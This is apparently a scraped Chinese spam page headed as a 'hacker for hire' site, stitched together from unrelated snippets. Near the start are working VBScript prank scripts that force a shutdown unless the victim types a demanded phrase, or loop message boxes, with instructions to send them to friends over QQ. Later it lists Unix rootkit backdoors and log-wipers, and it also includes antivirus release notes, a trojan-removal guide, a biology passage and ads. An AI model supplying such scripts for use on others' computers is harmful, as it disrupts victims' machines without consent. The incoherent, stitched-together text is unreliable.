黑客24小时在线接单的网站

我需要木马病毒

方法如下：在开始内点击运行输入at xx:xx shutdown -s,xx：xx代表几点几分是在几点几分关机输入shutdown.exe -s -t xx,xx代表多少秒钟后关机 如果要取消，就输入shutdown -a就可以取消了.

我听一个朋友说，有个人给他发个东西。他看了下。。说要输入一句话。。不然就管你机。是怎么编的。。。我知道关机命令和取消命令。。。不知道要对方怎么输才可以取消命令。。

脚本，例如下面的东西。就可以实现。

1。

首先呢,我们在桌面创建个新文件夹然后打开,在上面找到-工具T-文件夹选项O-查看

把隐藏已知文件类型的扩展名前面的勾去掉.

然后我们开始制作.在桌面建立个记事本,然后把下面代码复制进去

on error resume next

dim WSHshellA

set WSHshellA = wscript.createobject("wscript.shell")

WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪，不说我是猪就一分钟关你机，不信，你试试···"" ",0 ,true

dim a

do while(a "我是猪")

a = inputbox ("说我是猪,就不关机，快撒，说 ""我是猪""　","说不说","不说",8000,7000)

msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox"

loop

msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛,呵呵，猪"

dim WSHshell

set WSHshell = wscript.createobject("wscript.shell")

WSHshell.run "cmd.exe /c shutdown -a",0 ,true

msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈，真过瘾"

复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序，这样你再压缩下用QQ发给你朋友，对方打

开了就在60秒内要关闭计算机，

结素任务都不行，他只能说他是猪才能解决问题。够坏吧？ 注意哦，你可以把我是猪那个修改成任

意想说的话，要是对付你喜欢的人，

就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打

开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?

第2招编写VBS脚本

首先你可以看下面的

WScript.Echo("嘿，谢谢你打开我哦，我等你很久拉！"TSName)

WScript.Echo("你是可爱的小朋吗?")

WScript.Echo("哈,我想你拉，这你都不知道吗？")

WScript.Echo("怎么才来，说~是不是不关心我")

WScript.Echo("哼,我生气拉，等你这么久，心都凉啦。")

WScript.Echo("小强很生气，后果很严重哦。")

WScript.Echo("嘿嘿！你也会很惨滴哦")

WScript.Echo("是不是想清除我？")

WScript.Echo("那你要点上50下哦，不过会给你惊喜滴")

WScript.Echo("还剩49下，快点点哦")

WScript.Echo("还剩48下，快点，小笨蛋！")

WScript.Echo("还剩47下对，就这样快点点！")

WScript.Echo("还剩46下。你啊就是笨，要快哦，我先不打扰你工作。")

WScript.Echo("还剩45下，记得要快哦！")

WScript.Echo("还剩43下")

WScript.Echo("还剩42下")

WScript.Echo("还剩41下")

WScript.Echo("还剩40下")

WScript.Echo("还剩39下")

WScript.Echo("还剩38下")

WScript.Echo("还剩37下")

WScript.Echo("还剩36下")

WScript.Echo("还剩35下")

WScript.Echo("还剩34下")

WScript.Echo("还剩33下")

WScript.Echo("还剩32下")

WScript.Echo("还剩30下")

WScript.Echo("还剩29下")

WScript.Echo("还剩28下")

WScript.Echo("还剩27下")

WScript.Echo("还剩26下")

WScript.Echo("还剩25下")

WScript.Echo("还剩24下")

WScript.Echo("还剩23下")

WScript.Echo("还剩22下")

WScript.Echo("还剩21下")

WScript.Echo("还剩20下")

WScript.Echo("还剩19下")

WScript.Echo("还剩18下")

WScript.Echo("还剩17下")

WScript.Echo("还剩16下")

WScript.Echo("还剩15下")

WScript.Echo("还剩14下")

WScript.Echo("还剩13下停停！！！慢点，我有话要说")

WScript.Echo("还剩12下，你继续点我就会消失滴")

WScript.Echo("还剩11下，以后就看不到我拉。555555")

WScript.Echo("还剩10下，你现在可以选择停止！")

WScript.Echo("还剩9下。你还点啊，不要我拉？")

WScript.Echo("还剩8下，有点伤心拉，干嘛丢弃人家")

WScript.Echo("还剩7下。疯了，你有点负意！")

WScript.Echo("还剩6下。对。你就点吧，我恨你！")

WScript.Echo("还剩5下，不明白，删除我你就好吗？")

WScript.Echo("还剩4下！真要删除我？")

WScript.Echo("还剩3下。可是我真的很眷恋你。。。")

WScript.Echo("还剩2下。不要这么绝情嘛，人家是爱你的！")

WScript.Echo("还剩1下。哼，既然你这么绝情。也别怪我无义！！！")

WScript.Echo("我本因该消失的，不过我留恋你滴芳容，上帝又给了一次机会。")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

WScript.Echo("想结素我么?那你就再多点一次")

把这个复制在记事本,把后缀修改成.vbs

在打开呢就会先说第一句的 嘿，谢谢你打开我哦，我等你很久拉！

他无论是点关闭或者是点确定都会再说第2句

再点就说地3句 会按顺序说完

你们注意哦，最后10句话，只是10句，你要是把这个复制再粘贴N次，那他还有个打完呢？

这样才做到整人了，要是给喜欢的人发去啊，那就写你要说的话吧，双引号里面的可以随便更改

这个最简单的就是结素任务来结束它

2。

把以下代码复制到记事本中 然后重命名为后缀名为VBS的文件～

do

msgbox"爽死你~"

loop

Windows XP的关机是由Shutdown.exe程序来控制的，位于Windows\System32文件夹中。如

果想让Windows 2000也实现同样的效果，可以把Shutdown.exe复制到系统目录下。

比如你的电脑要在22:00关机，可以选择“开始→运行”，输入“at 22:00 Shutdown -s”，

这样，到了22点电脑就会出现“系统关机”对话框，默认有30秒钟的倒计时并提示你保存工

作。如果你想以倒计时的方式关机，可以输入“Shutdown.exe -s -t 3600”，这里表示60

分钟后自动关机，“3600”代表60分钟。

设置好自动关机后，如果想取消的话，可以在运行中输入“shutdown -a”。另外输入

“shutdown -i”，则可以打开设置自动关机对话框，对自动关机进行设置。

Shutdown.exe的参数，每个都具有特定的用途，执行每一个都会产生不同的效果，比如

“-s”就表示关闭本地计算机，“-a”表示取消关机操作，下面列出了更多参数，大家

可以在Shutdown.exe中按需使用。

-f：强行关闭应用程序

-m \\计算机名：控制远程计算机

-i：显示图形用户界面，但必须是Shutdown的第一个选项

-l：注销当前用户

-r：关机并重启

-t 时间：设置关机倒计时

-c "消息内容"：输入关机对话框中的消息内容（不能超127个字符）

有时候，我们需要定时关闭计算机，下面介绍一个在Windows XP下实现定时关机的简单方

法。

指定系统在22分钟后自动关闭：点击“开始→运行”，在“打开”中输入命令“Shutdown

－s －t 1320”（注意：引号不输入，参数之间有空格，1320的单位是秒），单击“确定”

按钮即可。

指定系统在某个时间（比如12：00）自动关闭：在“打开”中输入命令

“at 12：00 Shutdown －s”即可。

取消定时关机：在“打开”中输入命令“Shutdown －a”即可。

能的实现都是使用“Shutdown”命令实现的，shutdown的参数是在命令行窗口中输入

“shutdown”。笔者认为最有用的是“－i”参数，可以调出“远程关机对话框”，

能方便地实现局域网内计算机的远程关机，有兴趣的朋友可以试一试。

开始-程序-附件-系统工具-计划任务-添加任务计划-下一步-浏览

-c:\windows\system32\shadow.exe-下一步-选好要关机的时间，

下一步-输入用户名和密码，只要是系统里有的用户就行，但一定要有密码，

没有也要设一个，下一步，选上“在完成时打开此任务的高级属性”，

在运行栏后面加上“ -S”引号不要哦。

木马不断复制。求救

超级巡警(Anti-Spyware toolkit) v3.2.0 简体中文正式版发布

系统安全专门查杀并可辅助查杀各种木马、流氓软件、利用Rootkit技术的各种后门和其它恶意代码(间谍软件、蠕虫病毒)等等。提供了多种专业工具，提供系统 /IE修复、隐私保护和安全优化功能，提供了全面的系统监测功能，使你对系统的变化了如指掌，配合手动分析可近100%的查杀未知恶意代码！

主要特色：

1)、通用的自动化Rootkit解决方案，不使用传统特征码，即可检测各种利用Rootkit技术隐藏的木马、后门。

2)、全面检测隐藏进程、隐藏服务、隐藏端口。

3)、自动检测和修复Winsock SPI链的相关错误。

4)、系统内核服务描述表恢复，显示和摘除被Hook的内核函数，自动还原被Inline hook的内核函数。

5)、独创的快速匹配算法，在最小的系统资源占用级别上进行最快的扫描检测。

6)、扫描模块和实时监控共用引擎和库在内存中的同一份拷贝，大大降低系统资源占用，模块间高效协同工作。

7)、内存扫描和静态分析预警系统有机结合。

8)、立足于病毒家族的广谱特征，强力提高病毒检测率。

9)、前瞻性的主动防御监测体系，全面检测未知木马。

10)、国内首个支持NTFS数据流扫描，使检测更彻底。

11)、纯绿色软件，解压即可使用。

主要功能：

启发预警，启动管理，IE插件管理，SPI链自动检测与修复，Rootkit检测，服务管理，隐藏服务检测，过滤微软默认服务，服务增加和删除，SSDT (服务描述表)恢复，进程管理，隐藏进程检测，DLL模块强制卸载，检测隐藏端口，断开连接，定位远程IP，WHOIS查询，关闭端口，IE修复，流氓插件免疫，恶意网站屏蔽，系统LJ清理，智能扫描，文件粉碎机，软件卸载，系统优化，系统修复，漏洞检查和修复，右键查毒，漏洞检查和修复，系统诊断报告，论坛救援，启发扫描，NTFS数据流扫描，签名分析，全面扫描，内存扫描，目录扫描，信任列表，实时监控，智能升级。

v 3.2更新

1.安全优化-系统修复中加入修复磁盘文件关联功能

2.初步解决软件启动时写屏造成的闪烁问题

3.增强监控功能，在病毒库更新后智能对敏感位置检测

4.升级模块将主动下载KEY，用户不用在担心KEY过期或者损坏的问题。

5、文件粉碎机的UI小调整

6、信任列表增加全选菜单

7、修正在内存扫描时仍然可以点击快速扫描的BUG。

8、进程管理增加强制使用微软数字签名校验菜单，钩选后将只使用微软签名来验证进程和模块文件。

8、服务管理增加强制使用微软数字签名校验菜单，钩选后将只使用微软签名来验证服务文件和对应的DLL模块。

9、进程管理增加隐藏已知DLL的选项，默认开启，方便一目了然的查找可疑DLL文件。

10、进程管理增加动态保存进程日志的功能，这样可以查看木马运行后运行了哪些其它的进程。

11、端口关联增加动态保存连接日志的功能，这样可以查看木马运行后进行了那些网络连接。

12、进程管理中增加禁止进程创建功能，方便手动查杀木马/流氓，解决多进程互锁问题。

本版增强监测/查杀对灰鸽子木马能力。

安装版 官方下载：

http://wap.chinaz.com/x/ast/ast_setup.exe

http://ast.patching.net/ast_setup.exe

http://update1.dswlab.com/download/ast_setup.exe

http://update2.dswlab.com/ast_setup.exe

http://update3.dswlab.com/ast_setup.exe

http://killer.9i3g.cn/download/ast_setup.exe

http://ast.wulujia.com/ast_setup.exe

绿色版 官方下载：

http://wap.chinaz.com/x/ast/ast.zip

http://ast.patching.net/ast.zip

http://update1.dswlab.com/download/ast.zip

http://update2.dswlab.com/ast.zip

http://update3.dswlab.com/ast.zip

http://ast.wulujia.com/ast.zip

建议下载绿色版的，解压即可使用

在联网的情况下先升级到最新病毒库，然后进安全模式杀毒

给我O泡,给我O泡的下一句广告词是什么?

O泡果奶OOO，喝O泡果奶把清凉抱抱，喝O泡果奶把好喝抱抱，给我O泡，给我O泡，我要O泡，我要O泡。O泡果奶，我还要！^v^

木马病毒----谁知道?

所谓的木马程式 先从名字来看 木马 取自希腊神话 特洛伊木马屠城纪 是说敌人留一只木马 而你又傻傻的把他弄进城里 杀你全家

木马程式跟木马屠城很像 都是你自己把木马(病毒)迎进家门口的 但是木马程式的种类很多 最常用的就是一些腥煽色的东西 所以来路不明的东西不要下载 在来是 木马有分很多种 最基本的是测录你的纪录 最强的是远端遥控 木马应该不算病毒 他不太会造成你系统毁损 但是你的资料会不保 资源会被占用 等等后果 而且木马程式用一般的扫毒软体无法扫掉( 诺顿 趋势)而是要另外去查询方法 用手动的方法去扫掉 大概就是这样吧

PWSteal.Lemir.Gen 是对一类游戏盗密木马的统称，与一般的木马病毒不同的是这个名称并不代表著一个固定的木马，而是一类木马，并且这类木马的数目极其繁多，清除方法也各不相同。 以前我们曾经撰写过一篇《手工彻底清除 PWSteal.Lemir.Gen(SysModule32.DLL,SysModule64.DLL) 木马的方法》 的文章，用来介绍清除一个档案是 SysModule32.DLL、SysModule64.DLL 的 PWSteal.Lemir.Gen 木马，但由於许多朋友没有留意到文章前面的提示，以为 PWSteal.Lemir.Gen 指的都是同一个木马，使用这个方法应该是可以的，结果按照指示反覆操作也无法成功，非常失望。

一般的，当您遇到这种木马时可以先尝试用自己的防毒软体来清除它，但如果防毒软体在发现这种木马后却无法成功清除掉它，总是报告清除失败或隔离失败，那该怎麼办呢？

费尔托斯特安全是一款可以清除木马和病毒的软体，它可以清除大量的 PWSteal.Lemir.Gen 木马，如果您有它的正式版可以在升级到最新病毒码后尝试用它扫瞄清除，但这里需要特别提醒一下：由於这类木马新变种层出不穷，所以不能保证费尔托斯特安全能够识别出目前所有的或者您遇到的。 那麼除此之外难道就没有其他办法了吗？有的，下方就介绍一个借助免费工具「费尔木马强力清除助手」来清除这种顽固性 PWSteal.Lemir.Gen 木马的方法：

使用这个方法前必须要先知道这个木马的档案名是什麼。防毒软体在发现木马后一般都会报告它的完整档案名，您需要先准确的记录下这个档案名。比如：如果防毒软体提示 C:\Windows\hello.dll 是 PWSteal.Lemir.Gen 木马，则记下 C:\Windows\hello.dll 这个名子。这里需要注意档案名一定要记准确，因为有许多木马会把自己的档案名故意伪装成和正常的档案名很接近，比如 svch0st.exe(木马)-svchost.exe(正常)、Expl0rer.exe(木马)-Explorer.exe(正常)、intrenat.exe / internet.exe(木马)-internat.exe(正常)等等。特别是数位0几乎和大写字母O一样，很容易让人看错，所以一定要注意区分它们，否则万一记错将有可能把正常的档案清除掉，那就麻烦了；

暂停防毒软体的即时监控，防止在清除时被它阻止造成失败。比如如果当初是你的诺顿发现了这个木马，那麼请先暂停诺顿的即时监控或即时扫瞄；

下载费尔木马强力清除助手 http://dl.filseclab.com/down/powerrmv.zip；

释放 PowerRmv.zip 到一个目录，然后执行其中的 PowerRmv.exe 启动「费尔木马强力清除助手」。在「档案名」中输入要清除的 PWSteal.Lemir.Gen 木马档案名。比如如果您在第1步中记下的档案名是 C:\Windows\hello.dll，那麼这时就输入它；

按「清除」。这时程式会询问你是否要举报此病毒到费尔安全实验室，建议点「是」表示同意。接著程式会继续提示是否确定要清除它，仍然选「是」；

之后，如果此木马被成功清除程式会提示成功；或者也可能提示此木马无法被立即删除需要重新启动电脑。无论是哪种情况请点选「确定」，这时如果您在前面同意了举报此木马那麼程式会自动创建并开启一个「病毒举报」的电子邮件，其中会包含这个木马的样本档案，如果您看到了这个邮件请把它直接传送给 virus@filseclab.com 。如果您并没有看到这封邮件也没有关系，可以忽略。

最后，如果程式前面提示了重新启动电脑后才能清除那麼请一定重新启动您的电脑，在电脑重新启动后这个木马应该就被清除掉了。

重要提示： 如果您按上面的方法操作之后，发现不久这个木马又出现了，并且还是同样的档案名，那麼您可以用上面的方法再重复执行一次，不过这次操作时请选择程式中的「抑制档案再次生成」选项， 这样清除后一般木马就很难再复活了。这个功能是最新版「费尔木马强力清除助手」中提供的，如果您的没有这个选项，请从上面的位址中重新下载一次。

注意：

「费尔木马强力清除助手」有很强的档案删除能力，清除后的档案将无法再还原，所以在清除前一定要确定档案名没有输入错误。

如果您按上面的方法操作后仍然不能成功清除掉木马，则可能是电脑中还存在著另外一个更主要的木马程式或备份，在它被清除后会自动从另外一处还原。这时您需要用防毒软体扫瞄出所有的这些木马，然后逐一或同时清除才行。

三、rootkit 的类型：

我们可将 rootkit 分为两大类

1.Application rootkit - 建立於应用层级

Application rootkit 是最常被拿来使用的 rootkit。攻击者以 rootkit 中的木马程式来替

换系统中正常的应用程式与系统档案。木马程式会提供后门给攻击者并隐藏其踪迹，攻击者做的

任何活动都不会储存在纪录档中。下面列举了一些攻击者可能取代的档案：

‧隐藏攻击者踪迹的程式 -

(1).ls, find, du - 木马程式可以隐藏攻击者档案、欺骗系统，让系统的档案及目录泄露讯息。

(2).ps, top, pidof - 这些程式都是程序监看程式，它们可以让攻击者在进行攻击的过程中，

隐藏攻击者本身的程序。

(3).netstat - netstat 是用来检查网路活动的连结与监听，如开放的通讯埠等等。木马程式

netstat 可以隐藏攻击者的网路活动，例如 ssh daemon 或其他服务。

(4).killall - 木马程式 killall 让管理者无法停止程序。

(5).ifconfig - 当监听软体正在执行时，木马程式 ifconfig 不会显示 PROMISC flag，这样

可以隐藏攻击者，不被监听软体察觉。

(6).crontab - 木马程式 crontab 可以隐藏攻击者的 crontab 进入情况。

(7).tcpd, syslogd - 木马程式 tcpd 与 "syslog" 不会纪录攻击者的行为。

‧后门程式 -

(1).chfn - 提升使用者的权限。执行 chfn，在输入新使用者名称时，只要输入 rootkit 密码

，就可以取得 root 的权限。

(2).chsh - 提升使用者的权限。执行 chsh，在输入新 shell 时，只要输入 rootkit 密码，

就可以取得 root 的权限。

(3).passwd - 提升使用者的权限。执行 passwd，在输入新密码时，只要输入 rootkit 密码，

就可以取得 root 的权限。

(4).login - 能够纪录任何使用者名称，包含 root 登入的密码。

(5).bd2 - 木马程式 rpcbind 允许攻击者在受害主机上执行任意程式码。

‧木马程式程式 -

(1).inetd - 木马程式 inetd 可以替攻击者打开远端登入的通讯埠，只要输入密码就可以取得

root 的权限。

(2).rshd - 替攻击者提供远端的 shell。(范例：rsh [hostname] - l [rootkit password])

(3).rsh - 透过 rsh 可以取得 root 的密码。(范例：rsh [hostname] - l [rootkit password])

(4).sshd -攻击者以特定帐号密码登入就能拥有 root shell 的权限。

‧监听程式 -

(1).linsniffer - linux 小型的监听程式。

(2).sniffchk - 这个程式可以检验与确认网路监听程式是否正在执行。

(3).le - Solaris Ethernet 封包的监听程式。

(4).snif - linux 其他封包的监听程式。

(5).sniff-10mb - 这是一个设计来监听 10mbps Ethernet 的监听程式。

(6).sniff-100mb - 这是一个设计来监听 100mbps Ethernet 的监听程式。

‧其他种类 -

(1).fix - 安装木马程式时 (例如：ls) 更改的时间戳记与检验封包值的讯息。

(2).wted - wtmp 的编辑程式。可让攻击者修改 wtmp。

(3).z2 - 移除 wtmp/utmp/lastlog。

(4).bindshell - 把 rootshell 与某个通讯埠结合在一起。(预设埠号为 31337)

(5).zap3 - 攻击者会从 wtmp, utmp, lastlog, wtmpx 和 utmpx 移除他们的踪迹。zap3 通常

根据下列目录来找寻纪录档的位置，例如 /var/log, /var/adm, /usr/adm, 与 /var/run。

病毒复制循环可分为哪几个阶段？各个阶段的主要过程如何

（一）吸附(adsorption):病毒表面接触蛋白 ---- 细胞表面受体

吸附（Adsorption）是指病毒附着于敏感细胞的表面，它是感染的起始期。细胞与病毒相互作用最初是偶然碰撞和静电作用，这是可逆的联结。随后的特异性吸附是非常重要的，根据这一点可确定许多病毒的宿主范围，不吸附就不能引起感染。

脊髓灰质炎病毒的细胞表面受体是免疫球蛋白超家族，在非灵长类细胞上没有发现此受体，而猴肾细胞、 Hela细胞和人二倍体纤维母细胞上有它的受体，故脊髓来质炎病毒能感染人体鼻、咽、肠和脊髓前角细胞，引起脊髓灰质炎（小儿麻痹）。

水磨石病毒的细胞表面受体是含唾液酸（N-乙酰神经氨酸）的糖蛋白，它与流感病毒表面的血凝素剌突（受体连结蛋白）有特殊的亲和力，如用神经氨酸酶破坏该受体，则流感病毒不再吸附这种细胞。

此外，HIV受体为CD4；鼻病毒的受体为细胞粘附分子-1（1CAM-1）；EB病毒的受体为补体受体-2（CR-2）。病毒吸附也受离子强度、pH、温度等环境条件的影响。研究病毒的吸附过程对了解受体组成、功能、致病机理以及探讨抗病毒治疗有重要意义。

（二）穿入(penetration):膜融合； 病毒胞饮等

穿入（Penetration）是指病毒核酸或感染性核衣壳穿过细胞进入胞浆，开始病毒感染的细胞内期。

主要有三种方式：（1）融合 (Fusion)，在细胞膜表面病毒囊膜与细胞膜融合，病毒的核衣壳进入胞浆。副粘病毒以融合方式进入，如麻疹病毒、腮腺炎病毒囊膜上有融合蛋白，带有一段疏水氨基酸，介导细胞膜与病毒囊膜的融合。（2）胞饮 (Viropexis)，由于细胞膜内陷整个病毒被吞饮入胞内形成囊泡。胞饮是病毒穿入的常见方式，也是哺乳动物细胞本身具有一种摄取各种营养物质和激素的方式。当病毒与受体结合后，在细胞膜的特殊区域与病毒病毒一起内陷形成膜性囊泡，此时病毒在胞浆中仍被胞膜覆盖。某些囊膜病毒，如流感病毒借助病毒的血凝素（HA）完成脂膜间的融合，囊泡内低Ph环境使HA蛋白的三维结构发生变化，从而介导病毒囊膜与囊泡膜的融合，病毒核衣壳进入胞浆。（3）直接进入，某些无囊膜病毒，如脊髓灰质炎病毒与受体接角后，衣壳蛋白的多肽构形发生变化并对蛋白水解酶敏感，病毒核酸可直接穿越细胞膜到细胞浆中，而大部分蛋白衣壳仍留在胞膜外，这种进入的方式较为少见。

（三）脱壳(uncoating):细胞溶酶体酶； 病毒脱壳酶

穿入和脱壳是边续的过程，失去病毒体的完整性被称为“脱壳 (Uncoating)”。脱壳到出现新的感染病毒之间叫“隐蔽期”。经胞饮进入细胞的病毒，衣壳可被吞噬体中的溶酶体酶降解而去除。有的病毒，如脊髓灰质炎病毒，在吸附穿入细胞的过程中病毒的RNA释放到胞浆中。而痘苗病毒当其复杂的核心结构进入胞浆中后，随之病毒体多聚酶活化，合成病毒脱壳所需要的酶，完成脱壳。

（四）生物合成(biosynthesis):病毒核酸复制； 病毒蛋白质合成

DNA病毒和RNA病毒在复制机理有区别，但复制的结果都是合成核酸分子和蛋白质衣壳，然后装配成新的有感染性的病毒。一个复制周期大约需6～8小时。

U盘中病毒怎么办

电脑中毒一般都是重装系统来解决，杀毒有时候也不彻底。

当然在重装系统时要格式化一下所有分区，这样可以确保无病毒残留。

系统方面：玉米系统 比较好用，不但稳定，也很流畅。